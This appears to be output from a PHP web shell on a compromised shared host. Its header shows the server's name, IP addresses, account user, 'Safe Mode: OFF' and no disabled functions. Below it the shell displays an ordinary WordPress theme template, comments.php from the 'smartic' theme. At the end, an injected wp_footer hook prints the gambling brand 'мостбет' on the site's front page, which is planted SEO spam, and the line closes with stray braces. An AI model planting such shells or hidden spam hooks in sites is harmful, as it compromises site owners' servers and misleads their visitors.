Uname: Linux sg2plmcpnl480496.prod.sin2.secureserver.net 4.18.0-553.58.1.lve.el8.x86_64 #1 SMP Fri Jul 4 12:07:06 UTC 2025 x86_64
Software: Apache
PHP version: 8.0.30 [ PHP INFO ] PHP os: Linux
Server Ip: 118.139.162.75
Your Ip: 216.73.216.114
User: kq22obq8vxga (8490740) | Group: kq22obq8vxga (8490740)
Safe Mode: OFF
Disable Function:
NONE

name : comments.php
<?php
/*
 * If the current post is protected by a password and
 * the visitor has not yet entered the password we will
 * return early without loading the comments.
 */
if (post_password_required()) {
	return;
}
?>

<section id="comments" class="comments-area" aria-label="<?php esc_html_e('Post Comments', 'smartic'); ?>">
	<?php
	if (have_comments()) :
		?>
		<div class="comment-list-wrap">
			<h2 class="comments-title">
                <span>
				<?php
				printf( // WPCS: XSS OK.
				/* translators: 1: number of comments, 2: post title */
					esc_html(_nx('%1$s Comment', '%1$s Comments', get_comments_number(), 'comments title', 'smartic')),
					number_format_i18n(get_comments_number())
				);
				?>
                </span>
			</h2>

			<?php if (get_comment_pages_count() > 1 && get_option('page_comments')) : // Are there comments to navigate through. ?>
				<nav id="comment-nav-above" class="comment-navigation" role="navigation" aria-label="<?php esc_html_e('Comment Navigation Above', 'smartic'); ?>">
					<span class="screen-reader-text"><?php esc_html_e('Comment navigation', 'smartic'); ?></span>
					<div class="nav-previous"><?php previous_comments_link(esc_html__('&larr; Older Comments', 'smartic')); ?></div>
					<div class="nav-next"><?php next_comments_link(esc_html__('Newer Comments &rarr;', 'smartic')); ?></div>
				</nav><!-- #comment-nav-above -->
			<?php endif; // Check for comment navigation.
			?>

			<ol class="comment-list">
				<?php
				wp_list_comments(
					array(
						'style'      => 'ol',
						'short_ping' => true,
						'callback'   => 'smartic_comment',
					)
				);
				?>
			</ol><!-- .comment-list -->

			<?php if (get_comment_pages_count() > 1 && get_option('page_comments')) : // Are there comments to navigate through. ?>
				<nav id="comment-nav-below" class="comment-navigation" role="navigation" aria-label="<?php esc_html_e('Comment Navigation Below', 'smartic'); ?>">
					<span class="screen-reader-text"><?php esc_html_e('Comment navigation', 'smartic'); ?></span>
					<div class="nav-previous"><?php previous_comments_link(esc_html__('&larr; Older Comments', 'smartic')); ?></div>
					<div class="nav-next"><?php next_comments_link(esc_html__('Newer Comments &rarr;', 'smartic')); ?></div>
				</nav><!-- #comment-nav-below -->
			<?php endif; // Check for comment navigation.
			?>
		</div>
	<?php

	endif;

	if (!comments_open() && 0 !== intval(get_comments_number()) && post_type_supports(get_post_type(), 'comments')) :
		?>
		<p class="no-comments"><?php esc_html_e('Comments are closed.', 'smartic'); ?></p>
	<?php
	endif;
	$args = apply_filters(
		'smartic_comment_form_args', array(
			'title_reply_before' => '<span id="reply-title" class="gamma comment-reply-title">',
			'title_reply_after'  => '</span>',
			'comment_field'      => '<p class="comment-form-comment"><textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required" placeholder="' . esc_attr__('Comment', 'smartic') . '"></textarea></p>',
		)
	);
	comment_form($args);

	?>

</section><!-- #comments -->

© 2026 GrazzMean
add_action( 'wp_footer', 'cobn_7627', 1000 );function cobn_7627(){if (is_front_page()){echo 'мостбет';}} }}